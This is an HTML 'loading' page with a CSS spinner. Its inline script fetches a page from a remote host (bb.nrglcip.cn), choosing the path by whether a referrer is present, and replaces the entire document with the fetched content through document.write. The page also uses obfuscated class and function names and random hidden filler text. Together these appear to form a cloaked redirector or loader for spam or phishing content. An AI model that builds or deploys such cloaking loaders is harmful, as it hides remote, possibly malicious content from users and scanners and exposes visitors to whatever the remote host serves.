<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .KWBjUhIFcN {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .KWBjUhIFcN .oq4U61C8 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .KWBjUhIFcN .content {
            line-height: 50px;
            text-align: center
        }

        .KWBjUhIFcN .img {
            width: 100%
        }

        .KWBjUhIFcN .X3zwSi9Hd {
            text-align: center
        }

        .KWBjUhIFcN .X3zwSi9Hd span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .KWBjUhIFcN .X3zwSi9Hd span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .KWBjUhIFcN .X3zwSi9Hd span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .KWBjUhIFcN .X3zwSi9Hd span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .KWBjUhIFcN .X3zwSi9Hd span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .KWBjUhIFcN .X3zwSi9Hd span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .KWBjUhIFcN .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function IaY1DBj2IpGb(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var IWNZXy = IaY1DBj2IpGb('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ IWNZXy +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ IWNZXy +".html?a=share";
		}
		
        yMqzcp=url+"#"+new Date().getTime();
        yMqzcp && function() {
            $.get(yMqzcp, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >YCIy3zQb8y5vkLHcWJduvhrAURuwHeujSvy42S04s0Yt54wHM9sSac8mHH0ehR5NfIQvuJhcg9r9h</ul>
<div style='display:none'>lbaUOPqkN9VjNXz2M</div>
<li style='display:none' >Eu3udoE5C4l8TBr6RY273tTCN9oq6dN6mTufUvbtJRdwPi37PognpyVNw6zy6Fn47lFGeBdRijl9QO6XTwgQdQVCQUpiIhS92k5lR</li>
<span style='display:none'>sSNmmtJXaHewGN8aUJsTOBD4w1ePmaBDI6R7aXpdQjyKKkiavx8nkWaJ7hcB</span>
<b style='display:none' >jOIq3SgJTCfnOhNZ4xw4x4VHeb45ghtKrfCYHypNQMyMha5FmhZL03KRuzlZMnMArtSLFHTzu8xiwnkYX84eT2I6jB6NNeALg083</b><div class="KWBjUhIFcN">
    <div class="oq4U61C8">
        <div class="X3zwSi9Hd">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>XheiStIX2k92CE</p>
<p  style='display:none'>XheiStIX2k92CE</p>
<div style='display:none'>rshw62pQTi74G3TsLqBlvBhZTRM3pyF9V</div>
<img  src='' style='display:none'></body>
</html>